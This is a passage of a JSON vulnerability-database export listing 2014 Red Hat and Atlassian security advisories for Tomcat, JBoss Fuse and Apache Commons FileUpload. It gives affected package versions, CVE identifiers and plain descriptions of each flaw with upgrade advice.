"packageName": "tomcat7", "packageFilename": "tomcat7-7.0.40-13_patch_02.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.0.40-13_patch_02.ep6.el5", "arch": "src", "packageName": "tomcat7", "packageFilename": "tomcat7-7.0.40-13_patch_02.ep6.el5.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.40-9_patch_02.ep6.el6", "arch": "noarch", "packageName": "tomcat7", "packageFilename": "tomcat7-7.0.40-9_patch_02.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.40-9_patch_02.ep6.el6", "arch": "src", "packageName": "tomcat7", "packageFilename": "tomcat7-7.0.40-9_patch_02.ep6.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.0.40-13_patch_02.ep6.el5", "arch": "noarch", "packageName": "tomcat7-admin-webapps", "packageFilename": "tomcat7-admin-webapps-7.0.40-13_patch_02.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.40-9_patch_02.ep6.el6", "arch": "noarch", "packageName": "tomcat7-admin-webapps", "packageFilename": "tomcat7-admin-webapps-7.0.40-9_patch_02.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.0.40-13_patch_02.ep6.el5", "arch": "noarch", "packageName": "tomcat7-docs-webapp", "packageFilename": "tomcat7-docs-webapp-7.0.40-13_patch_02.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.40-9_patch_02.ep6.el6", "arch": "noarch", "packageName": "tomcat7-docs-webapp", "packageFilename": "tomcat7-docs-webapp-7.0.40-9_patch_02.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.0.40-13_patch_02.ep6.el5", "arch": "noarch", "packageName": "tomcat7-el-2.2-api", "packageFilename": "tomcat7-el-2.2-api-7.0.40-13_patch_02.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.40-9_patch_02.ep6.el6", "arch": "noarch", "packageName": "tomcat7-el-2.2-api", "packageFilename": "tomcat7-el-2.2-api-7.0.40-9_patch_02.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.0.40-13_patch_02.ep6.el5", "arch": "noarch", "packageName": "tomcat7-javadoc", "packageFilename": "tomcat7-javadoc-7.0.40-13_patch_02.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.40-9_patch_02.ep6.el6", "arch": "noarch", "packageName": "tomcat7-javadoc", "packageFilename": "tomcat7-javadoc-7.0.40-9_patch_02.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.0.40-13_patch_02.ep6.el5", "arch": "noarch", "packageName": "tomcat7-jsp-2.2-api", "packageFilename": "tomcat7-jsp-2.2-api-7.0.40-13_patch_02.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.40-9_patch_02.ep6.el6", "arch": "noarch", "packageName": "tomcat7-jsp-2.2-api", "packageFilename": "tomcat7-jsp-2.2-api-7.0.40-9_patch_02.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.0.40-13_patch_02.ep6.el5", "arch": "noarch", "packageName": "tomcat7-lib", "packageFilename": "tomcat7-lib-7.0.40-13_patch_02.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.40-9_patch_02.ep6.el6", "arch": "noarch", "packageName": "tomcat7-lib", "packageFilename": "tomcat7-lib-7.0.40-9_patch_02.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.0.40-13_patch_02.ep6.el5", "arch": "noarch", "packageName": "tomcat7-log4j", "packageFilename": "tomcat7-log4j-7.0.40-13_patch_02.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.40-9_patch_02.ep6.el6", "arch": "noarch", "packageName": "tomcat7-log4j", "packageFilename": "tomcat7-log4j-7.0.40-9_patch_02.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.0.40-13_patch_02.ep6.el5", "arch": "noarch", "packageName": "tomcat7-servlet-3.0-api", "packageFilename": "tomcat7-servlet-3.0-api-7.0.40-13_patch_02.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.40-9_patch_02.ep6.el6", "arch": "noarch", "packageName": "tomcat7-servlet-3.0-api", "packageFilename": "tomcat7-servlet-3.0-api-7.0.40-9_patch_02.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "7.0.40-13_patch_02.ep6.el5", "arch": "noarch", "packageName": "tomcat7-webapps", "packageFilename": "tomcat7-webapps-7.0.40-13_patch_02.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.40-9_patch_02.ep6.el6", "arch": "noarch", "packageName": "tomcat7-webapps", "packageFilename": "tomcat7-webapps-7.0.40-9_patch_02.ep6.el6.noarch.rpm", "operator": "lt"}], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in Tomcat, handled small-sized buffers used by\nMultipartStream. A remote attacker could use this flaw to create a\nmalformed Content-Type header for a multipart request, causing Tomcat to\nenter an infinite loop when processing such an incoming request.\n(CVE-2014-0050)\n\nAll users of Red Hat JBoss Web Server 2.0.1 are advised to upgrade to these\nupdated tomcat7 packages, which contain backported patches to correct these\nissues. The Red Hat JBoss Web Server process must be restarted for the\nupdate to take effect.", "reporter": "RedHat", "published": "2014-05-21T19:09:06", "type": "redhat", "title": "(RHSA-2014:0526) Moderate: Red Hat JBoss Web Server 2.0.1 tomcat7 security update", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0050"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-08-09T19:46:59", "id": "RHSA-2014:0526", "href": "https://access.redhat.com/errata/RHSA-2014:0526", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-09T15:50:39", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "6.0.37-19_patch_04.ep6.el5", "arch": "noarch", "packageName": "tomcat6", "packageFilename": "tomcat6-6.0.37-19_patch_04.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "6.0.37-19_patch_04.ep6.el5", "arch": "src", "packageName": "tomcat6", "packageFilename": "tomcat6-6.0.37-19_patch_04.ep6.el5.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.37-27_patch_04.ep6.el6", "arch": "noarch", "packageName": "tomcat6", "packageFilename": "tomcat6-6.0.37-27_patch_04.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.37-27_patch_04.ep6.el6", "arch": "src", "packageName": "tomcat6", "packageFilename": "tomcat6-6.0.37-27_patch_04.ep6.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "6.0.37-19_patch_04.ep6.el5", "arch": "noarch", "packageName": "tomcat6-admin-webapps", "packageFilename": "tomcat6-admin-webapps-6.0.37-19_patch_04.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.37-27_patch_04.ep6.el6", "arch": "noarch", "packageName": "tomcat6-admin-webapps", "packageFilename": "tomcat6-admin-webapps-6.0.37-27_patch_04.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "6.0.37-19_patch_04.ep6.el5", "arch": "noarch", "packageName": "tomcat6-docs-webapp", "packageFilename": "tomcat6-docs-webapp-6.0.37-19_patch_04.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.37-27_patch_04.ep6.el6", "arch": "noarch", "packageName": "tomcat6-docs-webapp", "packageFilename": "tomcat6-docs-webapp-6.0.37-27_patch_04.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "6.0.37-19_patch_04.ep6.el5", "arch": "noarch", "packageName": "tomcat6-el-2.1-api", "packageFilename": "tomcat6-el-2.1-api-6.0.37-19_patch_04.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.37-27_patch_04.ep6.el6", "arch": "noarch", "packageName": "tomcat6-el-2.1-api", "packageFilename": "tomcat6-el-2.1-api-6.0.37-27_patch_04.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "6.0.37-19_patch_04.ep6.el5", "arch": "noarch", "packageName": "tomcat6-javadoc", "packageFilename": "tomcat6-javadoc-6.0.37-19_patch_04.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.37-27_patch_04.ep6.el6", "arch": "noarch", "packageName": "tomcat6-javadoc", "packageFilename": "tomcat6-javadoc-6.0.37-27_patch_04.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "6.0.37-19_patch_04.ep6.el5", "arch": "noarch", "packageName": "tomcat6-jsp-2.1-api", "packageFilename": "tomcat6-jsp-2.1-api-6.0.37-19_patch_04.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.37-27_patch_04.ep6.el6", "arch": "noarch", "packageName": "tomcat6-jsp-2.1-api", "packageFilename": "tomcat6-jsp-2.1-api-6.0.37-27_patch_04.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "6.0.37-19_patch_04.ep6.el5", "arch": "noarch", "packageName": "tomcat6-lib", "packageFilename": "tomcat6-lib-6.0.37-19_patch_04.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.37-27_patch_04.ep6.el6", "arch": "noarch", "packageName": "tomcat6-lib", "packageFilename": "tomcat6-lib-6.0.37-27_patch_04.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "6.0.37-19_patch_04.ep6.el5", "arch": "noarch", "packageName": "tomcat6-log4j", "packageFilename": "tomcat6-log4j-6.0.37-19_patch_04.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.37-27_patch_04.ep6.el6", "arch": "noarch", "packageName": "tomcat6-log4j", "packageFilename": "tomcat6-log4j-6.0.37-27_patch_04.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "6.0.37-19_patch_04.ep6.el5", "arch": "noarch", "packageName": "tomcat6-servlet-2.5-api", "packageFilename": "tomcat6-servlet-2.5-api-6.0.37-19_patch_04.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.37-27_patch_04.ep6.el6", "arch": "noarch", "packageName": "tomcat6-servlet-2.5-api", "packageFilename": "tomcat6-servlet-2.5-api-6.0.37-27_patch_04.ep6.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "6.0.37-19_patch_04.ep6.el5", "arch": "noarch", "packageName": "tomcat6-webapps", "packageFilename": "tomcat6-webapps-6.0.37-19_patch_04.ep6.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.37-27_patch_04.ep6.el6", "arch": "noarch", "packageName": "tomcat6-webapps", "packageFilename": "tomcat6-webapps-6.0.37-27_patch_04.ep6.el6.noarch.rpm", "operator": "lt"}], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nIt was found that previous fixes in Tomcat 6 to path parameter handling\nintroduced a regression that caused Tomcat to not properly disable URL\nrewriting to track session IDs when the disableURLRewriting option was\nenabled. A man-in-the-middle attacker could potentially use this flaw to\nhijack a user's session. (CVE-2014-0033)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in Tomcat, handled small-sized buffers used by\nMultipartStream. A remote attacker could use this flaw to create a\nmalformed Content-Type header for a multipart request, causing Tomcat to\nenter an infinite loop when processing such an incoming request.\n(CVE-2014-0050)\n\nAll users of Red Hat JBoss Web Server 2.0.1 are advised to upgrade to these\nupdated tomcat6 packages, which contain backported patches to correct these\nissues. The Red Hat JBoss Web Server process must be restarted for the\nupdate to take effect.", "reporter": "RedHat", "published": "2014-05-21T19:09:00", "type": "redhat", "title": "(RHSA-2014:0525) Moderate: Red Hat JBoss Web Server 2.0.1 tomcat6 security update", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0033", "CVE-2014-0050"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-08-09T19:46:59", "id": "RHSA-2014:0525", "href": "https://access.redhat.com/errata/RHSA-2014:0525", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-05-06T19:01:35", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [], "description": "Fuse ESB Enterprise is an integration platform based on Apache ServiceMix.\nFuse MQ Enterprise, based on Apache ActiveMQ, is a standards-compliant\nmessaging system that is tailored for use in mission critical applications.\n\nThis release of Fuse ESB Enterprise/MQ Enterprise 7.1.0 R1 P3 is an update\nto Fuse ESB Enterprise 7.1.0 and Fuse MQ Enterprise 7.1.0. It includes\nvarious bug fixes, which are listed in the README file included with the\npatch files.\n\nThe following security issues are also addressed with this release:\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. A remote attacker able to submit messages to\na Camel route could use this flaw to perform arbitrary remote code\nexecution in the context of the Camel server process. (CVE-2014-0003)\n\nIt was found that the ParserPool and Decrypter classes in the OpenSAML Java\nimplementation resolved external entities, permitting XML External Entity\n(XXE) attacks. A remote attacker could use this flaw to read files\naccessible to the user running the application server and, potentially,\nperform other more advanced XXE attacks. (CVE-2013-6440)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. A remote attacker\nable to submit messages to an XSLT Camel route could use this flaw to read\nfiles accessible to the user running the application server and,\npotentially, perform other more advanced XXE attacks. (CVE-2014-0002)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing Apache Commons FileUpload to enter an infinite\nloop when processing such an incoming request. (CVE-2014-0050)\n\nThe CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of\nthe Red Hat Security Response Team, and the CVE-2013-6440 issue was\ndiscovered by David Illsley, Ron Gutierrez of Gotham Digital Science, and\nDavid Jorm of the Red Hat Security Response Team.\n\nAll users of Fuse ESB Enterprise/MQ Enterprise 7.1.0 as provided from the\nRed Hat Customer Portal are advised to upgrade to Fuse ESB Enterprise/MQ\nEnterprise 7.1.0 R1 P3.\n", "reporter": "RedHat", "published": "2014-04-30T04:00:00", "type": "redhat", "title": "(RHSA-2014:0452) Important: Fuse ESB Enterprise/Fuse MQ Enterprise 7.1.0 update", "enchantments": {"score": {"modified": "2018-05-06T19:01:35", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-6440", "CVE-2013-7285", "CVE-2014-0002", "CVE-2014-0003", "CVE-2014-0050"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-03T23:15:51", "id": "RHSA-2014:0452", "href": "https://access.redhat.com/errata/RHSA-2014:0452", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-06-06T18:04:45", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageName": "tomcat6-servlet-2.5-api", "packageFilename": "tomcat6-servlet-2.5-api-6.0.24-72.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageName": "tomcat6-el-2.1-api", "packageFilename": "tomcat6-el-2.1-api-6.0.24-72.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageName": "tomcat6-lib", "packageFilename": "tomcat6-lib-6.0.24-72.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageName": "tomcat6-webapps", "packageFilename": "tomcat6-webapps-6.0.24-72.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageName": "tomcat6-admin-webapps", "packageFilename": "tomcat6-admin-webapps-6.0.24-72.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageName": "tomcat6-javadoc", "packageFilename": "tomcat6-javadoc-6.0.24-72.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageName": "tomcat6-docs-webapp", "packageFilename": "tomcat6-docs-webapp-6.0.24-72.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageName": "tomcat6", "packageFilename": "tomcat6-6.0.24-72.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageName": "tomcat6-jsp-2.1-api", "packageFilename": "tomcat6-jsp-2.1-api-6.0.24-72.el6_5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "src", "packageName": "tomcat6", "packageFilename": "tomcat6-6.0.24-72.el6_5.src.rpm", "operator": "lt"}], "description": "Apache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nIt was discovered that Apache Tomcat did not limit the length of chunk\nsizes when using chunked transfer encoding. A remote attacker could use\nthis flaw to perform a denial of service attack against Tomcat by streaming\nan unlimited quantity of data, leading to excessive consumption of server\nresources. (CVE-2014-0075)\n\nIt was found that Apache Tomcat did not check for overflowing values when\nparsing request content length headers. A remote attacker could use this\nflaw to perform an HTTP request smuggling attack on a Tomcat server located\nbehind a reverse proxy that processed the content length header correctly.\n(CVE-2014-0099)\n\nIt was found that the org.apache.catalina.servlets.DefaultServlet\nimplementation in Apache Tomcat allowed the definition of XML External\nEntities (XXEs) in provided XSLTs. A malicious application could use this\nto circumvent intended security restrictions to disclose sensitive\ninformation. (CVE-2014-0096)\n\nThe CVE-2014-0075 issue was discovered by David Jorm of Red Hat Product\nSecurity.\n\nThis update also fixes the following bugs:\n\n* The patch that resolved the CVE-2014-0050 issue contained redundant code.\nThis update removes the redundant code. (BZ#1094528)\n\n* The patch that resolved the CVE-2013-4322 issue contained an invalid\ncheck that triggered a java.io.EOFException while reading trailer headers\nfor chunked requests. This update fixes the check and the aforementioned\nexception is no longer triggered in the described scenario. (BZ#1095602)\n\nAll Tomcat 6 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect.\n", "reporter": "RedHat", "published": "2014-07-09T04:00:00", "type": "redhat", "title": "(RHSA-2014:0865) Moderate: tomcat6 security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-4322", "CVE-2014-0050", "CVE-2014-0075", "CVE-2014-0096", "CVE-2014-0099"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:29", "id": "RHSA-2014:0865", "href": "https://access.redhat.com/errata/RHSA-2014:0865", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-05-06T19:00:18", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [], "description": "Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint,\nflexible, open source enterprise service bus and integration platform.\n\nSecurity fixes:\n\nA flaw was found in the way Apache Santuario XML Security for Java\nvalidated XML signatures. Santuario allowed a signature to specify an\narbitrary canonicalization algorithm, which would be applied to the\nSignedInfo XML fragment. A remote attacker could exploit this to spoof an\nXML signature via a specially crafted XML signature block. (CVE-2013-2172)\n\nA flaw was found in the Apache Hadoop RPC protocol. A man-in-the-middle\nattacker could possibly use this flaw to unilaterally disable bidirectional\nauthentication between a client and a server, forcing a downgrade to simple\n(unidirectional) authentication. This flaw only affected users who have\nenabled Hadoop's Kerberos security features. (CVE-2013-2192)\n\nIt was discovered that the Spring OXM wrapper did not expose any property\nfor disabling entity resolution when using the JAXB unmarshaller. A remote\nattacker could use this flaw to conduct XML External Entity (XXE) attacks\non web sites, and read files in the context of the user running the\napplication server. (CVE-2013-4152)\n\nIt was discovered that the Apache Santuario XML Security for Java project\nallowed Document Type Definitions (DTDs) to be processed when applying\nTransforms even when secure validation was enabled. A remote attacker could\nuse this flaw to exhaust all available memory on the system, causing a\ndenial of service. (CVE-2013-4517)\n\nIt was found that the Spring MVC SourceHttpMessageConverter enabled entity\nresolution by default. A remote attacker could use this flaw to conduct XXE\nattacks on web sites, and read files in the context of the user running the\napplication server. (CVE-2013-6429)\n\nThe Spring JavaScript escape method insufficiently escaped some characters.\nApplications using this method to escape user-supplied content, which would\nbe rendered in HTML5 documents, could be exposed to cross-site scripting\n(XSS) flaws. (CVE-2013-6430)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing Apache Commons FileUpload to enter an infinite\nloop when processing such an incoming request. (CVE-2014-0050)\n\nIt was found that fixes for the CVE-2013-4152 and CVE-2013-6429 XXE issues\nin Spring were incomplete. Spring MVC processed user-provided XML and\nneither disabled XML external entities nor provided an option to disable\nthem, possibly allowing a remote attacker to conduct XXE attacks.\n(CVE-2014-0054)\n\nA cross-site scripting (XSS) flaw was found in the Spring Framework when\nusing Spring MVC. When the action was not specified in a Spring form, the\naction field would be populated with the requested URI, allowing an\nattacker to inject malicious content into the form. (CVE-2014-1904)\n\nThe HawtJNI Library class wrote native libraries to a predictable file name\nin /tmp when the native libraries were bundled in a JAR file, and no custom\nlibrary path was specified. A local attacker could overwrite these native\nlibraries with malicious versions during the window between when HawtJNI\nwrites them and when they are executed. (CVE-2013-2035)\n\nAn information disclosure flaw was found in the way Apache Zookeeper stored\nthe password of an administrative user in the log files. A local user with\naccess to these log files could use the exposed sensitive information to\ngain administrative access to an application using Apache Zookeeper.\n(CVE-2014-0085)\n\nThe CVE-2013-6430 issue was discovered by Jon Passki of Coverity SRL and\nArun Neelicattu of the Red Hat Security Response Team, the CVE-2013-2035\nissue was discovered by Florian Weimer of the Red Hat Product Security\nTeam, and the CVE-2014-0085 issue was discovered by Graeme Colman of\nRed Hat.\n", "reporter": "RedHat", "published": "2014-04-14T04:00:00", "type": "redhat", "title": "(RHSA-2014:0400) Moderate: Red Hat JBoss Fuse 6.1.0 update", "enchantments": {"score": {"modified": "2018-05-06T19:00:18", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-1624", "CVE-2013-2035", "CVE-2013-2172", "CVE-2013-2192", "CVE-2013-4152", "CVE-2013-4517", "CVE-2013-6429", "CVE-2013-6430", "CVE-2014-0050", "CVE-2014-0054", "CVE-2014-0085", "CVE-2014-1904", "CVE-2014-3584"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-03T23:15:50", "id": "RHSA-2014:0400", "href": "https://access.redhat.com/errata/RHSA-2014:0400", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "atlassian": [{"lastseen": "2018-10-11T12:11:10", "references": [], "description": "Apache commons-fileupload 1.3.1 was released this weekend with a fix for CVE-2014-0050, involving a DoS attack when using specially crafted multipart requests. We need to determine if Confluence is vulnerable, and if so, upgrade to this version of the library.", "edition": 6, "reporter": "richatkins", "published": "2014-02-10T05:56:15", "title": "Security vulnerability in apache commons fileupload", "type": "atlassian", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Confluence Server", "version": "5.4.3", "operator": "le"}, {"name": "Confluence Server", "version": "5.4-OD-20", "operator": "lt"}, {"name": "Confluence Server", "version": "5.4.4", "operator": "lt"}], "cvelist": ["CVE-2014-0050"], "modified": "2018-10-11T08:42:37", "id": "ATLASSIAN:CONFSERVER-32557", "href": "https://jira.atlassian.com/browse/CONFSERVER-32557", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-03-22T18:16:53", "references": [], "edition": 1, "description": "Apache commons-fileupload 1.3.1 was released this weekend with a fix for CVE-2014-0050, involving a DoS attack when using specially crafted multipart requests. We need to determine if Confluence is vulnerable, and if so, upgrade to this version of the library.", "reporter": "richatkins", "published": "2014-02-10T05:56:15", "title": "Security vulnerability in apache commons fileupload", "type": "atlassian", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Confluence", "version": "5.4-OD-20", "operator": "lt"}, {"name": "Confluence", "version": "5.4.4", "operator": "lt"}, {"name": "Confluence", "version": "5.4.3", "operator": "le"}], "cvelist": ["CVE-2014-0050"], "modified": "2017-02-17T04:33:34", "href": "https://jira.atlassian.com/browse/CONF-32557", "id": "ATLASSIAN:CONF-32557", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-18T13:50:34", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "6", "packageVersion": "1.2.2-1+deb6u2", "arch": "all", "packageFilename": 